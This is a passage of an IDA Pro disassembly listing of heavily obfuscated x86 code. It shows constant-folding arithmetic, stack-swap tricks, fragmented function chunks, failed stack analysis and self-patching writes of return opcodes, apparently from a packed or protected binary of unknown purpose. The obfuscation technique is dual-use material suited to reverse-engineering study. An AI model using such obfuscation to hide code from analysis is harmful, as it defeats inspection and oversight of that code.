		mov	eax, [ebp-0Ch]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44B47E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BA28

loc_451C78:				; CODE XREF: sub_43BA28+Cj
		jmp	sub_445787
; END OF FUNCTION CHUNK	FOR sub_43BA28

; =============== S U B	R O U T	I N E =======================================



sub_451C7D	proc near		; CODE XREF: y2kk37jd:0043D091p
					; y2kk37jd:00458D71j

; FUNCTION CHUNK AT 00440420 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00448339 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B4FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C7E5 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00451E34 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004520A7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045A3B5 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	al, [eax]
		jz	loc_451E34
		sub	al, 99h
		jmp	loc_44B4FE
sub_451C7D	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_402. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449DFE

loc_451C92:				; CODE XREF: sub_449DFE-CC78j
		mov	[edi], eax
		pop	edi
		xor	eax, eax
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-4], 0
		jmp	loc_44B54C
; END OF FUNCTION CHUNK	FOR sub_449DFE
; ---------------------------------------------------------------------------

loc_451CA3:				; CODE XREF: y2kk37jd:00455329j
		jnz	loc_43D31C
		jmp	loc_45251F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_451CAE:				; CODE XREF: sub_445226:loc_444C21j
		push	offset sub_452C0C
		jmp	loc_440FB8
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_451CB8:				; DATA XREF: sub_44F334-FB69o
		mov	eax, [ebp+8]
		push	eax
		call	sub_448C11

loc_451CC1:				; CODE XREF: y2kk37jd:004478CBj
		push	765F6861h

loc_451CC6:				; CODE XREF: y2kk37jd:004511B5j
		pop	eax
		rol	eax, 0Bh
		and	eax, 4EDC24AEh
		rol	eax, 12h
		jmp	loc_444E9B
; ---------------------------------------------------------------------------
		popf
		jmp	sub_449DAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_451CDE:				; CODE XREF: sub_453867+79F8j
		call	sub_4408B9

loc_451CE3:				; CODE XREF: sub_452995-179Bj
		jmp	loc_45A4BA
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451634

loc_451CE8:				; CODE XREF: sub_451634-153DFj
		pop	edi
		or	edi, 0A387592Eh
		rol	edi, 0Eh
		add	edi, 948A7EEh
		xchg	edi, [esp+8+var_8]
		jmp	loc_4477F4
; END OF FUNCTION CHUNK	FOR sub_451634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_451D00:				; CODE XREF: sub_449C4F+DA35j
		ja	loc_4553E2
		xor	eax, ebx
		jbe	loc_44E5DB
		test	esi, 0C651780Bh
		jmp	loc_440A93
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_451D19:				; CODE XREF: sub_442829:loc_43E255j
		jz	loc_45735F
		jmp	loc_448908
; END OF FUNCTION CHUNK	FOR sub_442829

; =============== S U B	R O U T	I N E =======================================



sub_451D24	proc near		; CODE XREF: sub_445226+298p
					; y2kk37jd:00448FD8j
		xchg	edx, [esp+0]
		pop	edx
		call	sub_4526B7
		retn
sub_451D24	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_451D2E:				; CODE XREF: y2kk37jd:004568F6j
		jmp	locret_4416AF
; ---------------------------------------------------------------------------

loc_451D33:				; CODE XREF: y2kk37jd:00445FC1j
		jmp	loc_451695
; ---------------------------------------------------------------------------
		add	edx, 0FA84914Ah
		xchg	edx, [esp]
		jmp	sub_44F3F5
; ---------------------------------------------------------------------------
		dw 8A0Fh
; ---------------------------------------------------------------------------
		xchg	eax, esi
		sub	[eax], al
		add	[ebx], dh
		xlat
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_451D4E:				; CODE XREF: sub_44F086:loc_45C22Fj
		rol	edx, 0Ch

loc_451D51:				; DATA XREF: sub_4423DA+4o
		add	edx, 0F887DE30h
		xchg	edx, [esp+4+var_4]
		jmp	loc_447913
; END OF FUNCTION CHUNK	FOR sub_44F086
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2F0

loc_451D5F:				; CODE XREF: sub_44B2F0+10j
		sub	eax, 44FE9FE3h
		call	sub_43C335

loc_451D6A:				; CODE XREF: y2kk37jd:0044C0D3j
		xor	ebp, 0A7788862h
		xchg	ebp, [edi]
		jmp	loc_45AB2C
; END OF FUNCTION CHUNK	FOR sub_44B2F0
; ---------------------------------------------------------------------------

loc_451D77:				; CODE XREF: y2kk37jd:loc_441FC0j
		push	eax
		push	ecx
		push	offset sub_4533A4
		jmp	loc_44B207
; ---------------------------------------------------------------------------

loc_451D83:				; CODE XREF: y2kk37jd:00459CC7j
		jge	loc_440B10

; =============== S U B	R O U T	I N E =======================================



sub_451D89	proc near		; CODE XREF: y2kk37jd:0044EBA9p

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		xchg	ecx, [esp-4+arg_0]
		mov	ebp, ecx
		call	sub_442C50
sub_451D89	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B814

loc_451D97:				; CODE XREF: sub_44B814+9930j
		jmp	loc_45551A
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_451D9C:				; CODE XREF: y2kk37jd:0044BF60j
		jmp	loc_441B5F
; ---------------------------------------------------------------------------

loc_451DA1:				; CODE XREF: y2kk37jd:0043FD7Aj
		jmp	sub_4526B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_451DA6:				; CODE XREF: sub_44DBF8-16BBj
		xor	eax, ds:4000ECh
		add	eax, 0F38CA4B4h
		xor	eax, 0F472A61Ch
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; START	OF FUNCTION CHUNK FOR sub_4526A0

loc_451DB8:				; CODE XREF: sub_4526A0:loc_43E320j
		add	eax, 0BF046483h
		push	offset loc_448F84
		jmp	loc_441B05
; END OF FUNCTION CHUNK	FOR sub_4526A0
; ---------------------------------------------------------------------------
		cmp	dword ptr [ebp-8], 0
		jz	loc_453AA7
		jmp	loc_44C65A
; ---------------------------------------------------------------------------

loc_451DD7:				; CODE XREF: y2kk37jd:00443177j
		jge	loc_45297A
		jno	loc_45177C
		jmp	loc_43EC3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_451DE8:				; CODE XREF: sub_4411C3+6B37j
		jp	loc_43B8D1

loc_451DEE:				; CODE XREF: sub_459158:loc_440190j
		push	0F7302778h
		pop	eax
		xor	eax, 37673599h
		jmp	loc_43C98F
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_451DFF:				; CODE XREF: y2kk37jd:00445759j
		jo	loc_447BD3
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_451E05:				; CODE XREF: sub_43C851:loc_445740j
		add	esi, 613FEE05h
		push	offset sub_440472
		jmp	loc_4593B2
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_451E15:				; CODE XREF: sub_440F0C:loc_452335j
		jz	loc_4426DD

loc_451E1B:				; CODE XREF: y2kk37jd:0043DABEj
		jmp	loc_448446
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------
		add	ebx, 0DCF434E1h
		shl	ebx, 16h
		jmp	loc_4444AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_451E2E:				; CODE XREF: sub_45689F-C23Ej
		pushf

loc_451E2F:				; CODE XREF: sub_45ADEC:loc_443D66j
		jmp	loc_44170B
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C7D

loc_451E34:				; CODE XREF: sub_451C7D+6j
		sub	al, 99h
		push	offset sub_457AA8
		jmp	nullsub_473
; END OF FUNCTION CHUNK	FOR sub_451C7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_451E40:				; CODE XREF: sub_44AD49-97B7j
		jle	loc_4479DE
		or	edi, ebp
; END OF FUNCTION CHUNK	FOR sub_44AD49
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_451E48:				; CODE XREF: sub_4507BF:loc_44AD2Dj
		push	offset loc_441A58
		jmp	nullsub_120
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_451E52:				; CODE XREF: y2kk37jd:loc_44F84Cj
		sub	edx, 0B1D11E14h
		jmp	loc_45BCF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_451E5E:				; CODE XREF: y2kk37jd:loc_44A549j
		mov	byte ptr [eax],	0C3h
		mov	[ebp-4], eax
		call	sub_450489
; START	OF FUNCTION CHUNK FOR sub_453FBA

loc_451E69:				; CODE XREF: sub_453FBA:loc_44B4F9j
		push	edx
		mov	edx, ebx
		xchg	edx, [esp+0]
		push	9020AD75h
		xchg	ebp, [esp+4+var_4]
		mov	ebx, ebp
		jmp	loc_43BC08
; END OF FUNCTION CHUNK	FOR sub_453FBA

; =============== S U B	R O U T	I N E =======================================



sub_451E7E	proc near		; DATA XREF: sub_45392D-116CEo
		xor	eax, 993ED424h
		add	eax, ebp
		call	sub_44D56D
sub_451E7E	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44FA95

loc_451E8B:				; CODE XREF: sub_44FA95+AE6Bj
		jmp	loc_43C396
; END OF FUNCTION CHUNK	FOR sub_44FA95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_451E90:				; CODE XREF: sub_445226+EF1Bj
		jmp	loc_44B5E9
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_451E95:				; CODE XREF: sub_43F346+7726j
		jmp	loc_45B1D4
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------

loc_451E9A:				; CODE XREF: y2kk37jd:00454511j
		push	0F893C320h

; =============== S U B	R O U T	I N E =======================================



sub_451E9F	proc near		; CODE XREF: sub_448573:loc_446A9Bp

; FUNCTION CHUNK AT 0043C66A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF6E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004426EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004441E9 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004488DF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449396 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA73 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E2B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F1DA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004574A9 SIZE 00000004 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_44F1E2
		pop	ecx
		jmp	loc_4426EF
sub_451E9F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	esi, eax
		jmp	loc_44856D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_451EB5:				; CODE XREF: sub_43BD0D:loc_44B44Ej
					; y2kk37jd:00454637j
		or	ecx, 874FD0FFh
		rol	ecx, 17h
		test	ecx, 2
		jmp	loc_43DE77
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_451EC9:				; CODE XREF: sub_43EF4F:loc_45BC54j
		jnb	loc_4474D2
		jmp	loc_43E5EA
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------

loc_451ED4:				; CODE XREF: y2kk37jd:0044D6E3j
					; y2kk37jd:0044D703j
		and	edx, 6E46D0ECh
		rol	edx, 0Fh
		add	edx, 9F89CD39h
		popf
		add	eax, edx
		jmp	loc_44C150
; ---------------------------------------------------------------------------

loc_451EEB:				; DATA XREF: sub_452B75+6o
		mov	eax, [ebp+8]
		mov	eax, [eax-8]
		or	eax, 8
		or	eax, 10h
		mov	edx, [ebp+8]
		mov	[edx-8], eax
		jmp	loc_45AB92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452B75

loc_451F02:				; CODE XREF: sub_452B75j
		cmp	dword ptr [ebp-10h], 2
		jmp	loc_45A566
; END OF FUNCTION CHUNK	FOR sub_452B75
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44438E

loc_451F0B:				; CODE XREF: sub_44438E:loc_443760j
					; y2kk37jd:0044FADBj
		jz	loc_442DEE

loc_451F11:				; CODE XREF: y2kk37jd:00441A91j
		jmp	nullsub_121
; END OF FUNCTION CHUNK	FOR sub_44438E
; ---------------------------------------------------------------------------
		sub	eax, 5E692E22h
		jmp	loc_442DEB
; ---------------------------------------------------------------------------

loc_451F21:				; CODE XREF: y2kk37jd:00448346j
		mov	edx, 0ADB83DDAh
		jg	sub_43D005

loc_451F2C:				; CODE XREF: y2kk37jd:loc_44832Ej
		xor	edx, 144B790Fh
		push	ebx
		pushf
		push	6CEDBB26h
		pop	ebx
		and	ebx, 13F164DAh
		jmp	loc_45B1E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CB02

loc_451F45:				; CODE XREF: sub_43CB02+10CD7j
		jnz	loc_45ACB4
		add	edi, 0AB780205h
		jmp	loc_45ACA6
; END OF FUNCTION CHUNK	FOR sub_43CB02
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_312. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_451F57:				; CODE XREF: y2kk37jd:loc_44B20Cj
		push	edx
		push	8328F0CEh
		pop	edx
		or	edx, 166BDC4Fh
		add	edx, 68D97873h
		jmp	loc_448D7D

; =============== S U B	R O U T	I N E =======================================



sub_451F6F	proc near		; CODE XREF: y2kk37jd:0043D3FEj
					; y2kk37jd:00440186p

; FUNCTION CHUNK AT 0044E49B SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_45405E
		mov	edx, 0CF0182F6h
		call	sub_455DD8
		jmp	loc_44E49B
sub_451F6F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F91

loc_451F87:				; CODE XREF: sub_458F91+16j
		xor	edi, 14FA8EF1h
		add	edi, 1A970F22h
		xchg	edi, [esp+0]
		jmp	loc_43FF9C
; END OF FUNCTION CHUNK	FOR sub_458F91
; ---------------------------------------------------------------------------
		test	ecx, 0D60AB35Fh
		jmp	loc_450B28
; ---------------------------------------------------------------------------
		js	loc_44B5C4
		jmp	sub_45104A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_451FB1:				; CODE XREF: sub_43F911-1B18j
		jnz	loc_4494D9
		jmp	loc_45490F
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_451FBC:				; CODE XREF: sub_443BAF-1A99j
		add	eax, esi
		pop	esi
		xor	eax, 40D6EC69h
		push	eax
		jmp	loc_44032D
; END OF FUNCTION CHUNK	FOR sub_443BAF

; =============== S U B	R O U T	I N E =======================================



sub_451FCB	proc near		; CODE XREF: sub_43C335+Cp
					; y2kk37jd:0044E8F5j
		xchg	esi, [esp+0]
		pop	esi
		push	27EF9F33h
		pop	eax
		jmp	loc_452C40
sub_451FCB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_451FDA:				; CODE XREF: y2kk37jd:00441CF9j
					; y2kk37jd:0044D028j
		push	ebp
		mov	ebp, esp
		call	sub_44FB6D
; START	OF FUNCTION CHUNK FOR sub_455613

loc_451FE2:				; CODE XREF: sub_455613+Fj
		pop	esi
		rol	esi, 2
		add	esi, 9F880B03h
		rol	esi, 18h
		sub	esi, 490C6835h
		cmp	esi, 0DA4BA91Dh
		jmp	loc_443026
; END OF FUNCTION CHUNK	FOR sub_455613
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_452000:				; CODE XREF: sub_445226+115C7j
		jbe	loc_459DE3
		push	7D5745D5h
		add	ecx, ebp
		mov	[edx], esi
		jmp	loc_44FA3A
; ---------------------------------------------------------------------------

loc_452014:				; CODE XREF: sub_445226+F81Aj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_4560E7
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_452022:				; CODE XREF: sub_44610D-38B2j
		cmp	ebp, edi
		jmp	loc_44AD0F
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------

loc_452029:				; CODE XREF: y2kk37jd:004433D0j
		jz	loc_447DDB
		jmp	loc_442CC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_452034:				; CODE XREF: sub_449E69-6810j
		mov	[eax], edx
		or	eax, ebx
		jmp	loc_45898D
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_45203D:				; CODE XREF: sub_44107E+2D34j
		test	esi, 93D89F8Dh
		jmp	loc_44D46A
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
		sub	esi, edi
		jmp	sub_43D5C1
; ---------------------------------------------------------------------------

loc_45204F:				; CODE XREF: y2kk37jd:004474FBj
					; y2kk37jd:0044A7DFj
		xor	esi, 29AFC5ADh
		add	esi, 0CB2B5D7h
		xchg	esi, [esp]
		jmp	nullsub_277
; ---------------------------------------------------------------------------
		sbb	edx, 26EDF108h
		jmp	sub_452A89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_45206E:				; CODE XREF: sub_43D41D:loc_45C092j
		jz	loc_43EFFE
		jmp	loc_452C6E
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_452079:				; CODE XREF: sub_453867:loc_43E8FBj
		mov	edx, [ebp+8]
		mov	[edx-18h], eax
; END OF FUNCTION CHUNK	FOR sub_453867
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45207F:				; CODE XREF: sub_445226:loc_455F1Cj
		inc	dword ptr [ebp-4]
		mov	eax, [ebp+8]
		call	sub_444A2B

loc_45208A:				; CODE XREF: y2kk37jd:00457921j
		jmp	loc_45652B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_45208F:				; CODE XREF: sub_44AAA1+805Aj
		jmp	loc_4438EC
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EAA8

loc_452094:				; CODE XREF: sub_43EAA8-3348j
		jmp	loc_45367B
; END OF FUNCTION CHUNK	FOR sub_43EAA8
; ---------------------------------------------------------------------------
		rol	ecx, 1Ch
		jmp	sub_446718
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C7D

loc_4520A7:				; CODE XREF: sub_451C7D+873Ej
		xchg	ebx, [edx]
		jmp	loc_44C7E5
; END OF FUNCTION CHUNK	FOR sub_451C7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D4CE

loc_4520AE:				; CODE XREF: sub_43D4CE+1A8E8j
		mov	edx, ebx
		xchg	edx, [esp+4+var_4]

loc_4520B3:				; CODE XREF: y2kk37jd:00458137j
		push	offset loc_44C3DE
		jmp	loc_45B48B
; END OF FUNCTION CHUNK	FOR sub_43D4CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8FF

loc_4520BD:				; CODE XREF: sub_44B8FF+Aj
		jnz	loc_441449
		jmp	loc_43E1F6
; END OF FUNCTION CHUNK	FOR sub_44B8FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF1D

loc_4520C8:				; CODE XREF: sub_44DF1D-F6E9j
		add	edi, edx
		pop	edx
		mov	[edi], eax
		xchg	edx, [esp+4+var_4]
		mov	edi, edx
		jmp	loc_453F3E
; END OF FUNCTION CHUNK	FOR sub_44DF1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_4520D7:				; CODE XREF: sub_43B0F5:loc_44C117j
		mov	eax, [ebp-0Ch]
		cmp	byte ptr [eax],	0
		jnz	loc_44EC3C
		mov	eax, [ebp-8]
		shl	eax, 3
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		jmp	loc_4518CB
; ---------------------------------------------------------------------------

loc_4520F4:				; CODE XREF: sub_43B0F5:loc_44C111j
		mov	eax, [ebp-0Ch]
		jmp	loc_447D50
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45922C

loc_4520FC:				; CODE XREF: sub_45922C:loc_44655Cj
		jge	loc_43CADF
; END OF FUNCTION CHUNK	FOR sub_45922C
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_452102:				; CODE XREF: sub_45136B-D9A5j
		jmp	loc_452BD8
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
		and	esi, eax
		jmp	loc_43CAD8
; ---------------------------------------------------------------------------

locret_45210E:				; CODE XREF: y2kk37jd:loc_4532EAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C335

loc_45210F:				; CODE XREF: sub_43C335+8129j
		rol	eax, 8
		add	eax, 1516D259h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43C999
		jmp	loc_443951
; END OF FUNCTION CHUNK	FOR sub_43C335
; ---------------------------------------------------------------------------

locret_452127:				; CODE XREF: y2kk37jd:loc_453DB9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_452128:				; CODE XREF: sub_44B03F:loc_44B04Cj
		jl	loc_44CFBB

loc_45212E:				; CODE XREF: y2kk37jd:0044CC2Cj
		jmp	loc_45216A
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
		sub	ebp, 25B0919Ch
		jmp	loc_44CFB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45866A

loc_45213E:				; CODE XREF: sub_45866A+11j
		pop	esi
		rol	esi, 0Bh
		add	esi, 0D29489A3h
		xchg	esi, [esp-4+arg_0]
		jmp	loc_4462C7
; END OF FUNCTION CHUNK	FOR sub_45866A
; ---------------------------------------------------------------------------
		mov	ds:dword_41E1B8, eax
		lea	eax, nullsub_462
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_462
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_43BCEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_45216A:				; CODE XREF: sub_44B03F:loc_45212Ej
		push	esi
		push	offset sub_44AB95
		jmp	nullsub_122
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EA8

loc_452175:				; CODE XREF: sub_446EA8:loc_43D87Cj
		push	0DFD0E2F1h
		pop	ecx
		or	ecx, 32F19DECh
		xor	ecx, 0A68CA20Fh
		jmp	loc_45980C
; END OF FUNCTION CHUNK	FOR sub_446EA8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	eax, 9E471775h
		push	esi
		push	84E9E9C2h
		pop	esi
		jmp	loc_44E145

; =============== S U B	R O U T	I N E =======================================



sub_45219E	proc near		; CODE XREF: y2kk37jd:0045161Dj
					; sub_45705C+6p

; FUNCTION CHUNK AT 00448894 SIZE 00000013 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	esp, 0FFFFFFF8h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		mov	edx, [ebp-8]
		mov	eax, [ebp-4]
		jmp	loc_448894
sub_45219E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_4521B6:				; CODE XREF: sub_43CA5B+BF81j
		mov	[ecx], eax
		jmp	loc_44A894
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------

loc_4521BD:				; CODE XREF: y2kk37jd:loc_455AB0j
		pop	ecx
		or	ecx, 199B0B89h
		test	ecx, 800h
		jmp	loc_450C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4521CF:				; CODE XREF: sub_4448E2-4799j
		popf
		jle	loc_43EFC7
		jmp	sub_4471AD
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_4521DB:				; CODE XREF: sub_4447EA+14DAj
		mov	ebx, eax
		pop	eax
		xor	ebx, 0BDAD4D29h
		or	ebx, 0FD2EC3B2h
		rol	ebx, 1Ch
		add	ebx, 6D2FC8h
		xchg	ebx, [esp+4+var_4]
		jmp	loc_447828
; END OF FUNCTION CHUNK	FOR sub_4447EA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4521FC	proc near		; CODE XREF: sub_459EC3-1CD84p
					; y2kk37jd:00457677j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B3B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045037F SIZE 0000000F BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	esi, [esp-4+arg_0]
		lea	eax, [ebp-4]
		push	ebp
		jmp	loc_43B3B9
sub_4521FC	endp


; =============== S U B	R O U T	I N E =======================================



sub_45220C	proc near		; DATA XREF: sub_4430DD+2BAAo

; FUNCTION CHUNK AT 0044DDDF SIZE 00000005 BYTES

		mov	eax, [esp+0]
		push	offset loc_44A443
		jmp	loc_44DDDF
sub_45220C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_452219:				; CODE XREF: sub_43F346+11CC6j
		jz	loc_4455D8
		jmp	loc_455CDA
; END OF FUNCTION CHUNK	FOR sub_43F346

; =============== S U B	R O U T	I N E =======================================



sub_452224	proc near		; CODE XREF: y2kk37jd:004584D0j
					; sub_45B7AA:loc_45B7F6p
		xchg	ebx, [esp+0]
		pop	ebx
		push	eax
		mov	eax, ebp
		xchg	eax, [esp+0]
		mov	ebp, esp
		jmp	sub_458A36
sub_452224	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_452235:				; CODE XREF: sub_4429DD:loc_4491DFj
		sub	ecx, 0F4F25B03h
		xor	ecx, 70CB3B3Fh
		call	sub_451964
; END OF FUNCTION CHUNK	FOR sub_4429DD
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_452246:				; CODE XREF: sub_43F8B8+CF28j
		jmp	loc_45B3D2
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_45224B:				; CODE XREF: y2kk37jd:004531C1j
		jno	loc_44A5D3

; =============== S U B	R O U T	I N E =======================================



sub_452251	proc near		; CODE XREF: sub_44D39B:loc_44F65Bp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00444AE9 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	eax, [esp-4+arg_0]
		jmp	loc_444AE9
sub_452251	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_45225D:				; CODE XREF: sub_448DCA:loc_450819j
		mov	byte ptr [eax],	0C3h
		jmp	loc_441EC2
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_452265:				; CODE XREF: sub_453583j
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	ebx
		mov	ebx, edx
		jmp	loc_445CA2
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
		jmp	ds:off_41E010
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_45227C:				; CODE XREF: sub_443360+18309j
